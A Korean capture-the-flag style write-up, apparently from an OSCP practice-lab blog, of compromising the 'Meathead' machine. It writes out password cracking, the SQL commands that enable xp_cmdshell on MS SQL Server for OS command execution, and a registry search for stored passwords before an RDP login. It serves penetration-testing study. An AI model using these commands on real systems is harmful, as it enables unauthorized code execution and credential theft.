1. Enumeration

: Nmap

 

> 80 : plantronics

> hostname : meathead

 

 

: smb enum

 

 

: web enum

> 로그인을 시도해 보면

 

 

: ftp enum

 

> 내려받은 후 살펴보면

> 비번 걸려있음

 

 

 

 

2. Exploitation

 

: 크랙 작업

> 크랙 가능한 형태로 만들어주고 돌려주면

> 성공!

비번을 사용해 unrar을 시도하면

 

> 백업 파일이 있고, 열어보면

> ms-sql creds 확인!

 

 

 

 

 

: SQShell(SQSH)을 활용한 시스템 커맨드 실행

 

방법 1) 바로 접속

 

방법 2) Config 설정 후 sqshrc 생성해 접속

: config 설정

 

: .sqshrc 생성

 

: 접속 시도해 보면

 

성공!

어떤 방법이든 상관없음!

 

 

 

#sqsh OS 커맨드 실행

(sa 유저이기 때문에 xp_cmdshell을 통한

OS 커맨드 실행이 가능한 상황!)

 

1) 버전 확인

root@takudaddy:~# sqsh -S Meathead
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> SELECT @@VERSION;
2> go
: Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) 
  Aug 22 2017 17:04:49 
  Copyright (C) 2017 Microsoft Corporation
  Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
 
(1 row affected)
1>
 

 

2) xp_cmdshell 활성화

1> EXEC sp_configure 'show advanced option', '1';
2> go
Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE WITH OVERRIDE;
2> go
1> EXEC sp_configure 'xp_cmdshell', 1;
2> go
Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE;
2> go
1> EXEC sp_configure 'show advanced option';
2> go
name:         show advanced options
minimum:      0
maximum:      1
config_value: 1
run_value:    1
 
(return status = 0)
1>
 

 

: 활성화 후 커맨드 실행 테스트

> 정상 작동!

 

 

3) Local Enum

: systeminfo

 

 

: 사용자 검색 - net user

> jane

 

 

: 암호 검색 - reg query

레지스트리에서 특정 검색어 (pass) 검색

reg query HKLM /f pass /t REG_SZ /s
 

> 내용이 너무 많아 검색어 변경 후 재요청

> Twil*************234

 

 

: RDP 접속

> 침투 완료!

 

 

 

3. Privilege Escalation

 

Nmap 결과에서

80이 plantronics 임을 확인했고

관련 exploit을 찾으면 PoC 확인이

가능하고

내용대로 진행하면

 

728x90
반응형
저작자표시

'OSCP > Proving Ground' 카테고리의 다른 글

AD 공략 6 (decrypt VNC)  (0) 2022.09.16
39. Jacko (GET TO WORK) - Windows  (6) 2022.09.05
38. AuthBy (GET TO WORK) - Windows (hashcat, john, windows-kernel-exploit)  (0) 2022.09.04
37. Slort (GET TO WORK) - Windows (RFI.php, systeminfo)  (0) 2022.09.03
36. Nickel (GET TO WORK) - Windows (pdfcrack, ssh-port-forward, scp 파일 전송)  (0) 2022.09.01

+ Recent posts

티스토리툴바